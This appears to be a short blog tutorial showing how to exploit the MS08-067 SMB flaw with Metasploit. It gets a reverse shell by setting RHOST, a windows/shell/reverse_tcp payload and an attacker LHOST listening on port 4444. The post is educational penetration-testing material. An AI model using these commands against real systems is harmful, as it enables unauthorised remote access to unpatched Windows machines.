A reverse shell is a type of shell in which the target machine
communicates back to the attacking machine. The attacking machine has a
listener port on which it receives the connection, which by using, code or
command execution is achieved. For
this example, I will try to make reverse shell connection. The schema is
represented by the image below:
To make this kind of schema, I will use the ms08_067_netapi
vulnerability. Ms08 means Microsoft 2008, the year of the patch that make this
vulnerability. 067 means the patch number of that year (67th). The
vulnerability is explain here.
First, I set the exploit by using the command use
windows/smb/ms08_067_netapi. Next I had to set the target host on RHOST. Just
type set RHOST 131.107.1.222 to set the target IP address.
Next, run show options to see the this that has
been setup.The RHOST now point to 131.107.1.222 and the RPORT pointed to an
open port of the target.
The next step is to set the payload. Payload is
the set of codes that is used to execute
the exploit. This time to make a reverse shell, the payload that need to be set
is the windows/shell/reverse_tcp. In reverse shell, we need to set the
listening host (LHOST) because the target needs to listen to this host. Set
LHOST with the set LHOST 131.107.1.101. To see the LHOST again execute show
options.
This time, options command show the info of the
LHOST. The LHOST will listen on port 4444. The last command is to run the
exploit by typing exploit.
There you go, I have an access to the shell
target.
Reference:
- https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
- http://resources.infosecinstitute.com/icmp-reverse-shell/
No comments:
Post a Comment